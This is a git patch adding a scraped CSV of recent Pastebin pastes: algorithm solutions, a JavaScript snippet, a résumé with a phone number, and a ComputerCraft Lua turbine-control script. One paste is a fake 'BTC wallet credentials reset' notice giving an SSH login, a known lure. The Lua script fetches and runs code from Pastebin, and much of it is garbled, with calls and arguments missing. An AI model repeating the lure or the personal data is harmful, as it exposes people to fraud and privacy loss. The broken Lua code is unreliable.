From ba430dd8880b943b087f8447469792c1b6af1189 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 2 Nov 2023 18:05:43 +0000 Subject: [PATCH] Get recent pastes --- pastes/pastes_20231102180543.csv | 5659 ++++++++++++++++++++++++++++++ 1 file changed, 5659 insertions(+) create mode 100644 pastes/pastes_20231102180543.csv diff --git a/pastes/pastes_20231102180543.csv b/pastes/pastes_20231102180543.csv new file mode 100644 index 0000000..890c758 --- /dev/null +++ b/pastes/pastes_20231102180543.csv @@ -0,0 +1,5659 @@ +id,title,username,language,date,content +s71x9Y1Q,Untitled,Josif_tepe,C++,Thursday 2nd of November 2023 01:04:12 PM CDT,"#include +#include +#include +#include +#include +using namespace std; +const int maxn = 3e5 + 10; +const int logn = 24; +int n; +int id_node[maxn]; +int parent[maxn]; +int depth[maxn]; +int up_node[maxn][logn]; +int LCA(int A, int B) { + if(depth[A] < depth[B]) { + swap(A, B); + } + for(int i = logn - 1; i >= 0; i--) { + if(depth[A] - (1 << i) >= depth[B]) { + A = up_node[A][i]; + } + } + if(A == B) { + return A; + } + for(int i = logn - 1; i >= 0; i--) { + if(up_node[A][i] != -1 and up_node[A][i] != up_node[B][i]) { + A = up_node[A][i]; + B = up_node[B][i]; + } + } + return up_node[A][0]; + +} +int main() { + ios_base::sync_with_stdio(false); + int n; + cin >> n; + depth[0] = 0; + parent[0] = 0; + vector queries(n + 1, -1); + vector > > find_LCA; + for(int i = 1; i <= n; i++) { + char c; + cin >> c; + if(c == 'a') { + int x; + cin >> x; + x = id_node[x]; + id_node[i] = i; + parent[i] = x; + depth[i] = depth[parent[i]] + 1; + } + else if(c == 'b') { + int x; + cin >> x; + x = id_node[x]; + id_node[i] = parent[x]; + queries[i] = x; + } + else if(c == 'c') { + int x, y; + cin >> x >> y; + x = id_node[x]; + y = id_node[y]; + id_node[i] = x; + find_LCA.push_back(make_pair(i, make_pair(x, y))); + + } + } + for(int i = 0; i <= n; i++) { + up_node[i][0] = parent[i]; + for(int j = 1; j < logn; j++) { + up_node[i][j] = up_node[up_node[i][j - 1]][j - 1]; + } + } + for(int i = 0; i < find_LCA.size(); i++) { + int a = find_LCA[i].second.first; + int b = find_LCA[i].second.second; + queries[find_LCA[i].first] = depth[LCA(a, b)]; + } + for(int i = 1; i <= n; i++) { + if(queries[i] != -1) { + cout << queries[i] << endl; + } + } + return 0; +} + +/* + 12 + 1 2 + 2 4 + 2 5 + 4 7 + 5 8 + 1 3 + 3 6 + 6 9 + 6 10 + 6 11 + 11 12 + + **/ +" +v0vsPuqg,Untitled,arvind_iyer_2001,Latex,Thursday 2nd of November 2023 01:00:04 PM CDT,"\documentclass[a4paper,10pt]{article} +\usepackage{url} +\usepackage{parskip} +\usepackage{tabularx} +\usepackage[usenames,dvipsnames]{xcolor} +\usepackage[scale=0.9]{geometry} +\usepackage{enumitem} +\usepackage{titlesec} +\usepackage{multirow} +\usepackage[style=authoryear,sorting=ynt,maxbibnames=2]{biblatex} +\usepackage[unicode, draft=false]{hyperref} +\usepackage{fontawesome5} + +\definecolor{linkcolour}{rgb}{0,0.2,0.6} +\hypersetup{colorlinks,breaklinks,urlcolor=linkcolour,linkcolor=linkcolour} +\addbibresource{citations.bib} +\setlength\bibitemsep{1em} + +\newcolumntype{C}{>{\centering\arraybackslash}X} +\newlength{\fullcollw} +\setlength{\fullcollw}{0.4\textwidth} + +\titleformat{\section}{\Large\scshape\raggedright}{}{0em}{}[\titlerule] +\titlespacing{\section}{0pt}{10pt}{10pt} + +\pagestyle{empty} + +\begin{document} + +%---------------------------------------------------------------------------------------- +% TITLE +%---------------------------------------------------------------------------------------- + +\begin{tabularx}{\linewidth}{@{} C @{}} +\Huge{Arvind Iyer} \\[9pt] + +\href{}{\raisebox{-0.05\height}\faLinkedin\ arvindiyer2001} \ $|$ \href{}{\raisebox{-0.05\height}\faEnvelope \} \ $|$ +\ +\href{tel:+91-9108279418}{\raisebox{-0.05\height}\faMobile \ +91-9108279418} +$|$ \ +\href{}{\raisebox{-0.05\height}\faGithub\ arvind-iyer-2001} +\\ +\end{tabularx} + +%---------------------------------------------------------------------------------------- +% EXPERIENCE SECTIONS +%---------------------------------------------------------------------------------------- + +\section{Education} +\begin{tabularx}{\linewidth}{@{}l X@{}} +2019 - 2023 +& Bachelors of Engineering - \textbf{Birla Institute of Technology and Science, Pilani} +\hfill (GPA: 6.78) +\\ + +2017 - 2019 +& Class 12th CBSE - National Public School, Koromangala, Bengaluru +\hfill (92\%) +\\ + +2017 +& Class 10th ICSE - Bethany High School, Koromangala, Bengaluru +\hfill (90\%) +\\ +\end{tabularx} + + + +\section{Work Experience} +\begin{tabularx}{\linewidth}{ @{}l r@{} } +\textbf{Software Developer Intern - {TheONCompany, New York (Remote)}} & \hfill {May 2023 - Aug 2023} \\ +\multicolumn{2}{@{}X@{}}{- TheONCompany is an American Music Ed-Tech start up, which is building brands such as \textbf{CarnaticON} and Artificial Intelligence powered products with patented technologies to democratize online music education at scale.} \\ +\multicolumn{2}{@{}X@{}}{- Developed the web technologies for the prototype of a meetings application, capable of grading music in an online music class using Twilio Video SDK, Web Audio APIs and libraries such as Essentia.js to perform music processing.} \\ +\multicolumn{2}{@{}X@{}}{- Developed a website for CarnaticON to increase SEO and discoverability of instructors and courses on the internet.}\\ +% Learning Management System(LMS) to aid instructors to generate content and learning materials, manage students and schedule classes. Learning materials are interactive and help students learn music. +\\ +\textbf{Hardware Engineering Intern - {Samsung Semiconductor India Research (SSIR)}} & \hfill {July 2022 - December 2022} \\ +\multicolumn{2}{@{}X@{}}{- Worked in the Foundry Hardware Design Team to perform low power management, implementation and validation using Unified Power Format(UPF)(IEEE Standard 1801).}\\ +\multicolumn{2}{@{}X@{}}{- Performed automation of UPF Generation and CI/CD Operations using Perl Scripting, Perforce and XLS sheets reducing development and testing time from a few weeks to 2 hours.}\\ +\multicolumn{2}{@{}X@{}}{- Tools and Softwares - \textit{UPF, Verilog, Cadence and Synopsys Tools, TCL, Perl Language, Libreoffice, Linux Shell, Perforce.}}\\ +\end{tabularx} +%Projects +\section{Development Projects} +\begin{tabularx}{\linewidth}{ @{}l @{}X } +\textbf{\underline{DevOverflow, a Stack Overflow clone} - \href{}{GitHub Repo}}\\ +\multicolumn{2}{@{}X@{}}{- A developer forum with built-in GPT answer generation for instant code solutions, smart recommendation system and optimized data fetching for high-speed page loading, enhancing developer experience and knowledge acquisition.}\\ +\multicolumn{2}{@{}X@{}}{- Tech Stack - \textit{Next 13(Full Stack Framework), React.js, Shadcn-ui, Clerk, MongoDB, Prism.js, OpenAI GPT APIs}}\\ +\\ +\textbf{\underline{e-Commerce Demo - Admin Dashboard \& Store Application} - \href{}{GitHub Repo}}\\ + +\multicolumn{2}{@{}X@{}}{- Designed an admin dashboard for multi-store e-commerce management, enabling user profile setup, store creation, and sales analytics; also developed a customer-facing store app for easy purchasing.}\\ +\multicolumn{2}{@{}X@{}}{- Tech Stack - \textit{Next 13(Full Stack Framework), React.js, Shadcn-ui, Clerk, MySQL2, Cloudinary(CDN), Stripe API}.}\\ +\\ +\textbf{\underline{Urjaa Mobile Application} - \href{}{GitHub Repo}}\\ +\multicolumn{2}{@{}X@{}}{- Designed Urjaa Mobile App for connecting dietitians and patients, streamlining appointment scheduling, diet plan access, document management and PayTM payments.}\\ +% Urjaa is a service that helps dieticians connect and manage their patients with a mobile application created for patients to upload and view appointments, diet plans, and documents, and for dieticians to upload diet plans, notes, and access appointments and patient data. +\multicolumn{2}{@{}X@{}}{- Tech Stack - \textit{Flutter, Firebase (Firestore, Auth, Storage, Cloud Messaging, Cloud Functions), Hive, Google Calendar APIs.}}\\ + +\end{tabularx} + +\section{Positions of Responsibility} +\begin{tabularx}{\linewidth}{ @{}l r@{} } +{\textbf {Department of Backstage:} \emph{Chief Technical Coordinator and Research Head}} & \hfill {May 2021- April 2022}\\ +\multicolumn{2}{@{}X@{}}{- Led a team of over 50 Students to provide Backstage, Infrastructure and Production Support for all student events and fests of BITS Pilani Goa like Waves, Spree, Quark etc.}\\ +\multicolumn{2}{@{}X@{}}{- Provided consultation on upgrades to the audio-visual requirements of the college campus and auditorium of BITS Goa.}\\ +\\ +\textbf{Flutter Development for Beginners and Amateurs:} \emph{Course Instructor and Mentor}&\hfill {June 2021 - August 2021}\\ +\multicolumn{2}{@{}X@{}}{- Mentored over 100 beginners through a well-structured course on Flutter Development using local and cloud databases, through assignments and one-to-one assistance to develop a personal profile website and blog.}\\ +\end{tabularx} + +\section{Technical Proficiency} +\begin{tabularx}{\linewidth}{@{}l X@{}} +Programming Languages & \normalsize{JavaScript, TypeScript, Dart, Java, Python, Perl, C, SQL.}\\ +Development Tools \& SDKs & \normalsize{ Next.js, React.js, Redux, Express.js, Node.js, Shadcn-ui, Flutter, HTML, CSS, DrizzleORM. }\\ +APIs and Services & \normalsize{ MongoDB, Clerk, Mux, Cloudinary, Stripe, PlanetScale(MySQL), Web Audio, WebRTC. }\\ + +Softwares and Tools & \normalsize{Android Studio, XCode, VS Code, Docker. } \\ +Operating System & \normalsize{Windows, macOS, Linux (Ubuntu, Kali). }\\ +\end{tabularx} + +\end{document} +" +KLtYxwXb,DKL,abhyash,Java,Thursday 2nd of November 2023 12:56:54 PM CDT,"class Solution { + public int minAddToMakeValid(String s) { + Stackstack = new Stack<>(); + + for(char c : s.toCharArray()){ + if(c=='('){ + stack.push(c); + }else if(c == ')' && !stack.isEmpty() && stack.peek()=='('){ + stack.pop(); + }else{ + stack.push(c); + } + } + return stack.size(); + + } +}" +9jrMpTFM,Grafana Apache Echarts - Change line style,Superstar,JavaScript,Thursday 2nd of November 2023 12:55:27 PM CDT,"function transformData(data, types) { + const processedColors = {}; + + data.forEach((item, index) => { + // Extracts color property from the item + const { color } = item; + + if (processedColors[color]) { + const previousTypeIndex = types.indexOf(processedColors[color]); + + let nextItemIndex = previousTypeIndex + 1; + if (types.length > nextItemIndex) { + item.lineStyle = types[nextItemIndex] || ''; + } else { + item.lineStyle = ''; + } + processedColors[color] = item.lineStyle; + } else { + item.lineStyle = types[0]; + processedColors[color] = types[0]; + } + }); + + return data; +} + +let data = [ + { + color: 'green' + }, + { + color: 'green' + }, + { + color: 'green' + }, + { + color: 'green' + } +]; + +let types = ['solid', 'dashed', 'dotted']; + +data = transformData(data, types); + +console.log(data); +" +bdGayNrs,BTC Wallet Credentials have been reset,castlclass_20,GetText,Thursday 2nd of November 2023 12:48:22 PM CDT,"Dear User +We have received a request to reset the login information for your Bitcoin wallet. If you did not make this request, please disregard this message. +Your new login credentials will be +liverpoollvr8h:4zuYTC on +You can connect via SSH . +Regards" +kqPqsQVp,Count Nodes Equal to Average of Subtree,jayati,C++,Thursday 2nd of November 2023 12:14:17 PM CDT,"class Solution { +public: + int count = 0; + + pair postOrder(TreeNode* root) { + if (root == NULL) { + return {0, 0}; + } + + // First iterate over left and right subtrees. + pair left = postOrder(root->left); + pair right = postOrder(root->right); + + int nodeSum = left.first + right.first + root->val; + int nodeCount = left.second + right.second + 1; + + // Check if the average of the subtree is equal to the node value. + if (root->val == nodeSum / (nodeCount)) { + count++; + } + + // Return the sum of nodes and the count in the subtree. + return {nodeSum, nodeCount}; + } + + int averageOfSubtree(TreeNode* root) { + postOrder(root); + return count; + } +};" +3GiBWyg4,Untitled,Josif_tepe,C++,Thursday 2nd of November 2023 12:12:15 PM CDT,"#include +#include +#include +#include +#include +using namespace std; +const int maxn = 2e5 + 10; +const int logn = 24; +int n; +vector graph[maxn]; +int timer = 0; +int in_dfs[maxn], out_dfs[maxn]; +int parent[maxn]; +int up_node[maxn][logn]; +int depth[maxn]; +void dfs(int node, int parent, int dist) { + timer++; + in_dfs[node] = timer; + up_node[node][0] = parent; + depth[node] = dist; + for(int i = 1; i < logn; i++) { + up_node[node][i] = up_node[up_node[node][i - 1]][i - 1]; + } + for(int neighbour : graph[node]) { + if(neighbour != parent) { + dfs(neighbour, node, dist + 1); + } + } + timer++; + out_dfs[node] = timer; + +} +bool is_ancestor(int A, int B) { + if(in_dfs[A] <= in_dfs[B] and out_dfs[A] >= out_dfs[B]) { + return true; + } + return false; +} +int LCA(int A, int B) { + if(is_ancestor(A, B)) { + return A; + } + if(is_ancestor(B, A)) { + return B; + } + for(int i = logn - 1; i >= 0; i--) { + if(!is_ancestor(up_node[A][i], B)) { + A = up_node[A][i]; + } + } +// cout << A << endl; + return up_node[A][0]; +} +int main() { + int q; + cin >> n >> q; + parent[1] = 0; + for(int i = 2; i <= n; i++) { + int a, b; + cin >> a >> b; + graph[a].push_back(b); + graph[b].push_back(a); + } + dfs(1, 1, 0); + + + for(int i = 0; i < q; i++) { + int a, b; + cin >> a >> b; + int res = depth[a] + depth[b] - 2 * depth[LCA(a, b)]; + cout << res << endl; + } + + return 0; +} + +/* + 12 + 1 2 + 2 4 + 2 5 + 4 7 + 5 8 + 1 3 + 3 6 + 6 9 + 6 10 + 6 11 + 11 12 + + **/ +" +NdXjAM9S,Extreme Reactors Turbine,thetaz1009,Lua,Thursday 2nd of November 2023 12:09:48 PM CDT,"-----BigReactor Control +-----by SparkyBearBomb +-----Debug and suggestions by Taz1009 +-----orinally jaranvil aka jared314 + +-----feel free to use and/or modify this code +----------------------------------------------- + +local version = 1.4 + +--peripherals +local mon + +--monitor size +local monX +local monY + +term.clear() +-------------------FORMATTING------------------------------- +function clear() + mon.setBackgroundColor( + mon.clear() + mon.setCursorPos(1,1) +end + +--display text on computer's terminal screen +function draw_text_term(x, y, text, text_color, bg_color) + term.setTextColor(text_color) + term.setBackgroundColor(bg_color) + term.setCursorPos(x,y) + write(text) +end + +--display text text on monitor, ""mon"" peripheral +function draw_text(x, y, text, text_color, bg_color) + mon.setBackgroundColor(bg_color) + mon.setTextColor(text_color) + mon.setCursorPos(x,y) + mon.write(text) +end + +--draw line on computer terminal +function draw_line(x, y, length, color) + mon.setBackgroundColor(color) + mon.setCursorPos(x,y) + mon.write(string.rep("" "", length)) +end + +--draw line on computer terminal +function draw_line_term(x, y, length, color) + term.setBackgroundColor(color) + term.setCursorPos(x,y) + term.write(string.rep("" "", length)) +end + +-- Round Decimal Numbers +function roundNumber(num, n) + local mult = 10^(n or 0) + return math.floor(num * mult + 0.5) / mult +end + +--create progress bar +--draws two overlapping lines +--background line of bg_color +--main line of bar_color as a percentage of minVal/maxVal +function progress_bar(x, y, length, minVal, maxVal, bar_color, bg_color) + draw_line(x, y, length, bg_color) --background bar + local barSize = math.floor((minVal/maxVal) * length) + draw_line(x, y, barSize, bar_color) --progress so far +end + +--create status bar +--draws three overlapping lines +--background line of bg_color +function status_bar(x, y, length, minVal, medVal, maxVal, bar_color1, bar_color2, bg_color) + draw_line(x, y, length, bg_color) --backgoround bar + local barSize1 = math.floor((medVal/maxVal) * length) + local barSize2 = math.floor((minVal/maxVal) * length) + draw_line(x, y, barSize1, bar_color1) --progress so far + draw_line(x, y, barSize2, bar_color2) --progress so far +end + +--same as above but on the computer terminal +function progress_bar_term(x, y, length, minVal, maxVal, bar_color, bg_color) + draw_line_term(x, y, length, bg_color) --backgoround bar + local barSize = math.floor((minVal/maxVal) * length) + draw_line_term(x, y, barSize, bar_color) --progress so far +end + +--create button on monitor +function button(x, y, length, text, txt_color, bg_color) + draw_line(x, y, length, bg_color) + draw_text((x+2), y, text, txt_color, bg_color) +end + +--header and footer bars on monitor +function menu_bar() + draw_line(1, 1, monX, colors.purple) + draw_text(2, 1, ""Power Tools Settings"", colors.white, colors.purple) + draw_line(1, 26, monX, colors.purple) + draw_text(2, 26, "" Turbine Control"", colors.white, colors.purple) +end + +--dropdown menu for power options +function power_menu() + draw_line(1, 2, 9, colors.gray) + draw_line(1, 3, 9, colors.gray) + draw_line(1, 4, 9, colors.gray) + if active then + draw_text(2, 2, ""ON"", colors.lightGray, colors.gray) + draw_text(2, 3, ""OFF"", colors.white, colors.gray) + else + draw_text(2, 2, ""ON"", colors.white, colors.gray) + draw_text(2, 3, ""OFF"", colors.lightGray, colors.gray) + end + draw_text(2, 4, ""Auto"", colors.white, colors.gray) +end + +--dropbox menu for tools +function tools_menu() + draw_line(10, 2, 14, colors.gray) + draw_line(10, 3, 14, colors.gray) + draw_text(11, 2, ""Flow Rate"", colors.white, colors.gray) + draw_text(11, 3, ""Coils"", colors.white, colors.gray) +end + +--dropdown menu for settings +function settings_menu() + draw_line(12, 2, 18, colors.gray) + draw_line(12, 3, 18, colors.gray) + draw_text(13, 2, ""Check for Updates"", colors.white, colors.gray) + draw_text(13, 3, ""Reset peripherals"", colors.white, colors.gray) +end + +--basic popup screen with title bar and exit button +function popup_screen(y, title, height) + clear() + menu_bar() + + draw_line(4, y, 22, + draw_line(25, y, 1, + + for counter = y+1, height+y do + draw_line(4, counter, 22, colors.white) + end + + draw_text(25, y, ""X"", colors.white, + draw_text(5, y, title, colors.white, +end + +--write settings to config file +function save_config() + sw =""turbine_config.txt"", ""w"") + sw.writeLine(version) + sw.writeLine(side) + sw.writeLine(name) + sw.writeLine(auto_string) + sw.writeLine(on) + sw.writeLine(off) + sw.close() +end + +--read settings from file +function load_config() + sr =""turbine_config.txt"", ""r"") + version = tonumber(sr.readLine()) + side = sr.readLine() + name = sr.readLine() + auto_string = sr.readLine() + on = tonumber(sr.readLine()) + off = tonumber(sr.readLine()) + sr.close() +end + +function speed() + if RPMswitch == 0 then + draw_text(9, 5, "" LOW "", colors.gray, + draw_text(17, 5, "" HIGH "",, colors.gray) + else + draw_text(9, 5, "" LOW "",, colors.gray) + draw_text(17, 5, "" HIGH "", colors.gray, + end + +end + +function autoPower() + if auto == 1 then + draw_text(9, 21, "" Online "", colors.gray, + draw_text(17, 21, "" Offline "",, colors.gray) + else + draw_text(9, 21, "" Online "",, colors.gray) + draw_text(17, 21, "" Offline "", colors.gray, + end +end + + + +--------------------------HOMEPAGE---------------------------------- + +function homepage() + while true do + clear() + menu_bar() + terminal_screen() + speed() + autoPower() + + energy_stored = (turbine.battery()).stored() + RPM = (turbine.rotor()).RPM() + + +---------------------POWER STAT----------------------------------- + + active = + draw_text(2, 3, ""Power:"", colors.lightGray, + if active then + draw_text(9, 3, "" ONLINE "", colors.gray, + draw_text(17, 3, "" OFFLINE "",, colors.gray) + else + draw_text(9, 3, "" ONLINE "",, colors.gray) + draw_text(17, 3, "" OFFLINE "", colors.gray, + end + +---------------------Toggle Turbine Speed------------------------- + + draw_text(2, 5, ""Speed:"", colors.lightGray, + +------------------------Router speed------------------------------- + + draw_text(2, 7, ""Router Speed: "", colors.yellow, + local maxVal = 2200 + local minVal = math.floor((turbine.rotor()).RPM()) + draw_text(19, 7, minVal.."" rpm"", colors.white, + + if minVal < 700 then + progress_bar(2, 8, monX-2, minVal, maxVal, colors.lightBlue, colors.gray) + elseif minVal < 900 then + progress_bar(2, 8, monX-2, minVal, maxVal, colors.lime, colors.gray) + elseif minVal < 1700 then + progress_bar(2, 8, monX-2, minVal, maxVal, colors.lightBlue, colors.gray) + elseif minVal < 1900 then + progress_bar(2, 8, monX-2, minVal, maxVal, colors.lime, colors.gray) + elseif minVal < 2000 then + progress_bar(2, 8, monX-2, minVal, maxVal, colors.yellow, colors.gray) + elseif minVal >= 2000 then + progress_bar(2, 8, monX-2, minVal, maxVal,, colors.gray) + + end + + -----------Steam Level--------------------- + + draw_text(2, 10, ""Steam Amount: "", colors.yellow, + local maxVal = 8800 + local minVal = math.floor(((turbine.fluidTank()).input()).amount()) + draw_text(19, 10, minVal.."" mB"", colors.white, + progress_bar(2, 11, monX-2, minVal, maxVal, colors.lightGray, colors.gray) + + -------------OUTPUT------------------- + + draw_text(2, 13, ""RF/tick: "", colors.yellow, + rft = math.floor((turbine.battery()).producedLastTick()) + draw_text(19, 13, rft.."" RF/T"", colors.white, + progress_bar(2, 14, monX-2, minVal, maxVal, colors.lightGray, colors.gray) + + -----------RF STORAGE--------------- + + draw_text(2, 16, ""RF Stored:"", colors.lightGray, + energy_max = (turbine.battery()).capacity() + energy_stored_percent = math.floor((energy_stored/energy_max)*100) + local maxVal = 100 + local minVal = energy_stored_percent + draw_text(13, 16, energy_stored_percent..""% (""..energy_stored.."" RF)"", colors.white, + + progress_bar(2, 17, monX-2, minVal, maxVal,, colors.gray) + + ------------FLOW RATE--------------- + + draw_text(2, 19, ""Flow Rate: "", colors.yellow, + flow_rate = (turbine.fluidTank()).nominalFlowRate() + draw_text(19, 19, flow_rate.."" mB/t"", colors.white, + + --------Toggle Auto Power----------------- + + draw_text(2, 21, ""Auto:"", colors.lightGray, + + ------------COILS--------------------------- + + engaged = turbine.coilEngaged() + draw_text(2, 23, ""Coils: "", colors.lightGray, + if engaged then + draw_text(9, 23, ""Engaged "", colors.gray, + draw_text(17, 23, "" Disengaged"",, colors.gray) + else + draw_text(9, 23, ""Engaged "",, colors.gray) + draw_text(17, 23, "" Disengaged"", colors.gray, + end + sleep(0.5) + end +end + +------------------------------------------MENU SCREENS--------------------------------------------------- + +-------------------Tools---------------------- + +function flow_rate_menu() + popup_screen(3, ""Flow Rate"", 12) + flow_rate = (turbine.fluidTank()).nominalFlowRate() + current_flow = (turbine.fluidTank()).flowLastTick() + + draw_text(5, 5, ""Steam consumption"", colors.lime, colors.white) + draw_text(5, 6, ""last tick:"", colors.lime, colors.white) + draw_text(13, 8, current_flow.."" mB"",, colors.white) + + draw_text(5, 10, ""Flow Rate Setting:"", colors.lime, colors.white) + draw_text(8, 12, "" < "", colors.white, + draw_text(13, 12, flow_rate.."" mB"",, colors.white) + draw_text(21, 12, "" > "", colors.white, + + draw_text(13, 14, "" Okay "", colors.white, + + local event, side, xPos, yPos = os.pullEvent(""monitor_touch"") + + --decrease + if yPos == 12 and xPos >= 8 and xPos <= 11 then + (turbine.fluidTank()).setNominalFlowRate(flow_rate-10) + flow_rate_menu() + --increase + elseif yPos == 12 and xPos >= 21 and xPos <= 24 then + (turbine.fluidTank()).setNominalFlowRate(flow_rate+10) + flow_rate_menu() + end + + --Okay button + if yPos == 14 and xPos >= 13 and xPos <= 19 then + call_homepage() + end + + --Exit button + if yPos == 3 and xPos == 25 then + call_homepage() + end + call_homepage() +end + +function coil_menu() + engaged = turbine.coilEngaged() + + popup_screen(3, ""Induction Coils"", 8) + draw_text(5, 5, ""Coil Status:"",, colors.white) + + if engaged then + draw_text(5, 6, ""Engaged"", colors.lime, colors.white) + draw_text(10, 8, "" Disengage "", colors.white, + else + draw_text(5, 6, ""Disengaged"",, colors.white) + draw_text(10, 8, "" Engage "", colors.white, + end + + draw_text(12, 10, "" Okay "", colors.white, + + + local event, side, xPos, yPos = os.pullEvent(""monitor_touch"") + + if yPos == 8 and xPos >= 10 and xPos <= 21 then + if engaged then + turbine.setCoilEngaged(false) + coil_menu() + else + turbine.setCoilEngaged(true) + coil_menu() + end + end + + --okay button + if yPos == 10 and xPos >= 12 and xPos <= 18 then + call_homepage() + end + + coil_menu() +end + +-----------------------Settings-------------------------------- + +function install_update(program, pastebin) + clear() + draw_line(4, 5, 22, + + for counter = 6, 10 do + draw_line(4, counter, 22, colors.white) + end + + draw_text(5, 5, ""Updating..."", colors.white, + draw_text(5, 7, ""Open computer"",, colors.white) + draw_text(5, 8, ""terminal."",, colors.white) + + if fs.exists(""install"") then fs.delete(""install"") end +""pastebin get p4zeq7Ma install"") +""install"") + +end + +function update() + popup_screen(5, ""Updates"", 4) + draw_text(5, 7, ""Connecting to"",, colors.white) + draw_text(5, 8, ""pastebin..."",, colors.white) + + sleep(0.5) + +""pastebin get rqiSp0Ff current_version.txt"") + sr =""current_version.txt"", ""r"") + current_version = tonumber(sr.readLine()) + sr.close() + fs.delete(""current_version.txt"") + terminal_screen() + + if current_version > version then + + popup_screen(5, ""Updates"", 7) + draw_text(5, 7, ""Update Available!"",, colors.white) + draw_text(11, 9, "" Intall "", colors.white, + draw_text(11, 11, "" Ignore "", colors.white, + + local event, side, xPos, yPos = os.pullEvent(""monitor_touch"") + + --Instatll button + if yPos == 9 and xPos >= 11 and xPos <= 17 then + install_update() + end + + --Exit button + if yPos == 5 and xPos == 25 then + call_homepage() + end + call_homepage() + + else + popup_screen(5, ""Updates"", 5) + draw_text(5, 7, ""You are up to date!"",, colors.white) + draw_text(11, 9, "" Okay "", colors.white, + + local event, side, xPos, yPos = os.pullEvent(""monitor_touch"") + + --Okay button + if yPos == 9 and xPos >= 11 and xPos <= 17 then + call_homepage() + end + + --Exit button + if yPos == 5 and xPos == 25 then + call_homepage() + end + call_homepage() + end + + + +end + +function reset_peripherals() + clear() + draw_line(4, 5, 22, + + for counter = 6, 10 do + draw_line(4, counter, 22, colors.white) + end + + draw_text(5, 5, ""Reset Peripherals"", colors.white, + draw_text(5, 7, ""Open computer"",, colors.white) + draw_text(5, 8, ""terminal."",, colors.white) + setup_wizard() + +end + +--stop running status screen if monitors was touched +function stop() + while true do + local event, side, xPos, yPos = os.pullEvent(""monitor_touch"") + x = xPos + y = yPos + stop_function = ""monitor_touch"" + return + end +end + +function mon_touch() + +-------------------------when the monitor is touch on the homepage-------------------------------------------- + + if y == 1 then + if x > 0 and x < 8 then + power_menu() + local event, side, xPos, yPos = os.pullEvent(""monitor_touch"") + if xPos < 9 then + if yPos == 2 then + turbine.setActive(true) + call_homepage() + elseif yPos == 3 then + turbine.setActive(false) + call_homepage() + elseif yPos == 4 then + auto = 0 + call_homepage() + else + call_homepage() + end + end + end + end + + if y == 1 then + if x > 10 and x < 16 then + tools_menu() + local event, side, xPos, yPos = os.pullEvent(""monitor_touch"") + if xPos < 25 and xPos > 10 then + if yPos == 2 then + flow_rate_menu() + elseif yPos == 3 then + coil_menu() + else + call_homepage() + end + end + + elseif x > 19 and x < 28 then + settings_menu() + local event, side, xPos, yPos = os.pullEvent(""monitor_touch"") + if xPos > 13 then + if yPos == 2 then + update() + elseif yPos == 3 then + reset_peripherals() + else + call_homepage() + end + + end + call_homepage() + end + call_homepage() + +---------------------------------------------Power On or Off------------------------------------------------------------ + + elseif y == 3 then + if x > 9 and x < 17 then + turbine.setActive(true) + timer = 0 --reset anytime the reactor is turned on/off + call_homepage() + elseif x > 17 and x < 26 then + turbine.setActive(false) + timer = 0 --reset anytime the reactor is turned on/off + call_homepage() + else + call_homepage() + end + + +-------------------------------------------- Speed Low or High----------------------------------------------------------- + + elseif y == 5 then + if x > 9 and x < 13 then + -- low speed + RPMswitch = 0 + (turbine.fluidTank()).setNominalFlowRate(6000) + call_homepage() + + elseif x > 17 and x < 22 then + -- high speed + RPMswitch = 1 + (turbine.fluidTank()).setNominalFlowRate(11000) + call_homepage() + else + call_homepage() + end + + +----------------------------------------------Auto Power On & Off--------------------------------------------------------- + + elseif y == 21 then + if x > 9 and x < 17 then + auto = 1 + while true do + while auto == 1 do + if energy_stored_percent >= 99 then + turbine.setActive(false) + sleep(0.2) + + elseif energy_stored_percent <= 25 then + turbine.setActive(true) + sleep(0.2) + + end + end + end + + elseif x > 17 and x < 24 then + auto = 0 + timer = 0 --reset anytime the reactor is turned on/off + sleep(0.2) + call_homepage() + end + +-------------------------------------------Coils Engaged or Disengaged---------------------------------------------------- + + elseif y == 23 then + if x > 9 and x < 17 then + turbine.setCoilEngaged(true) + timer = 0 --reset anytime the reactor is turned on/off + call_homepage() + elseif x > 17 and x < 24 then + turbine.setCoilEngaged(false) + timer = 0 --reset anytime the reactor is turned on/off + call_homepage() + else + call_homepage() + end + call_homepage() + end + call_homepage() +end + + +function terminal_screen() + term.clear() + draw_line_term(1, 1, 55, + draw_text_term(13, 1, ""BigReactor Controls"", colors.white, + draw_line_term(1, 19, 55, + draw_text_term(13, 19, ""by SparkyBearBomb & Taz1009"", colors.white, + + draw_text_term(1, 3, ""Current program:"", colors.white, + draw_text_term(1, 4, ""Turbine Control v""..version,, + + draw_text_term(1, 6, ""Installer:"", colors.white, + draw_text_term(1, 7, """",, + + draw_text_term(1, 9, ""Please give me your feedback, suggestions,"", colors.white, + draw_text_term(1, 10, ""and errors!"", colors.white, + + draw_text_term(1, 11, """",, +end + +--run both homepage() and stop() until one returns +function call_homepage() + clear() + parallel.waitForAny(homepage, stop) + + if stop_function == ""terminal_screen"" then + stop_function = ""nothing"" + setup_wizard() + else if stop_function == ""monitor_touch"" then + stop_function = ""nothing"" + mon_touch() + end + end +end + +--try to wrap peripherals +--catch any errors + function test_turbine_connection() + turbine = peripheral.wrap(""top"") --wrap reactor + c = turbine.getConnected() + if unexpected_condition then error() end + end + + function test_monitor_connection() + mon = peripheral.wrap(side) --wrap mon + monX, monY = mon.getSize() --get mon size () + if unexpected_condition then error() end + end + +--test if the entered monitor and reactor can be wrapped +function test_configs() +term.clear() + +draw_line_term(1, 1, 55, colors.purple) +draw_text_term(10, 1, ""Turbine Controls"", colors.white, colors.purple) + +draw_line_term(1, 19, 55, colors.purple) +draw_text_term(10, 19, ""by SparkyBearBomb & Taz1009"", colors.white, colors.purple) + +draw_text_term(1, 3, ""Searching for a peripherals..."", colors.white, +sleep(1) + +turbine = turbineSearch() +mon = monitorSearch() + + +draw_text_term(2, 5, ""Connecting to turbine..."", colors.white, +sleep(0.5) + if turbine == null then + draw_text_term(1, 8, ""Error:"",, + draw_text_term(1, 9, ""Could not connect to turbine"",, + draw_text_term(1, 10, ""Turbine must be connected with networking cable"", colors.white, + draw_text_term(1, 11, ""and modems or the computer is directly beside"", colors.white, + draw_text_term(1, 12,""the turbine computer port."", colors.white, + draw_text_term(1, 14, ""Press Enter to continue..."", colors.gray, + wait = read() + setup_wizard() + else + draw_text_term(27, 5, ""success"",, + sleep(0.5) + end + +draw_text_term(2, 6, ""Connecting to monitor..."", colors.white, +sleep(0.5) + if mon == null then + draw_text_term(1, 7, ""Error:"",, + draw_text_term(1, 8, ""Could not connect to a monitor. Place a 3x4 advanced monitor"",, + 